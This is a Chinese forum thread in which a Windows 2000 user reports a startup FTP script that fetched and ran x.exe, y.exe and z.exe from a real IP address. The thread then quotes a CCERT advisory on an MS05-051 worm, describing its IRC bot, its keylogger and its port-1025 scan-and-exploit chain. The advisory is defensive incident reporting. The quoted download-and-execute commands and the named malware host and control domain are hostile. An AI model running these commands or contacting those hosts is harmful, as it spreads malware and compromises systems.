今天开机时发现异样，系统自动在DOS下执行一个FTP脚本，点开一看，如下：

        ftp -s:x
然后连接 61.138.10.55：21211

接着    get x.exe
        get y.exe
        get z.exe
然后删除脚本del x
再转到  system32 下执行
        start x.exe
        start y.exe
        start z.exe
但我搜索不到这三个EXE文件，在win2000服务里也没发现异样，查阅进程也没发现什么异样。是不是中了木马，我的机器是WIN2000 server版的，请高手帮忙诊断一下。

自己顶一下，不要沉了。

那个地址我查阅一下是黑龙江省佳木斯市的，登陆用户名那天我看到是okay,口令没看到，不知有没人能进到那边去看一下，是什么木马？

9日中午开机时发现它正在偷偷运行，忙断网，杀毒，没找到异常。现在我机器全副武装，瑞星防火墙，杀毒软件升到最新，反间谍软件也运行，就是没找到那三个东西。郁闷中。。。

没想到看到了z.exe在system32下,还有一个stdd.ini(这个应该不是），还有几个
10日生成的文件
perflib_perfdata_1fc.dat,
perflib_perfdata_34c.dat,
perflib_perfdata_48c.dat,
11日生成的文件。
perflib_perfdata_464.dat,
perflib_perfdata_1e8.dat,
这几个文件很可疑，分别是这两天我开机时生成的，不知道能发上来吗？

我刚刚查了一下，这几个DAT文件是文件由系统监视器创建的。不过以前每天没有 ，是不是升了瑞星2006后才有的。

最新发现：
          关于MSDTC蠕虫事件的通报
CCERT，郑辉
zhenghui@ccert.edu.cn
一、      概述
2005年12月9日22时，CCERT发现利用微软MS05-051漏洞进行传播的蠕虫，蠕虫随机生成B类地址进行扫描，扫描攻击端口为1025/TCP，攻击成功后植入后门程序，记录用户击键信息，同时远程控制被感染计算机。通过追踪观察到，蠕虫释放者在蠕虫感染达到一定数量后，删除了原始下载位置的蠕虫样本，从而控制蠕虫扩散的规模。
CCERT的观测结果与DShield的监测结果一致（参见图一，http://www.dshield.org/）
二、      蠕虫分析
1、    1、  蠕虫工作流程：
a)    a)        计算机被攻击后，将从61.138.10.55下载3个程序：x.exe，y.exe，z.exe并执行；
b)    b)        x.exe运行后，将在%system%目录下生成可执行文件remote.exe，同时修改注册表，以便开机后此文件可被执行；remote.exe为一IRC bot程序，连入killed.3322.org的#Phantom频道；
c)    c)        y.exe运行后，将在Program Files目录下生成CUZZSDFY系列文件；为键盘记录程序；
d)    d)        z.exe运行后，释放sqltob.exe，sqlscan.exe，sqlrep.exe和sqlexp.exe四个程序；其中sqlbot.exe生成随机B类地址并写入sqlscan.bat，然后sqlscan.bat启动sqlscan.exe 扫描指定B类地址的1025端口；存在此端口的IP信息由sqlrep.exe过滤处理后， sqlexp.exe对其进行缓冲区溢出攻击，攻击成功后，被感染计算机重复a；
e)    e)        sqlbot.exe也会修改注册表，使其可在开机后运行；
2、    2、  相关信息：
a)    a)        蠕虫原始版本传播下载地址：61.138.10.55
inetnum:      61.138.0.0 - 61.138.63.255
netname:      CNCGROUP-HL
country:      CN
descr:        CNCGROUP Heilongjiang province network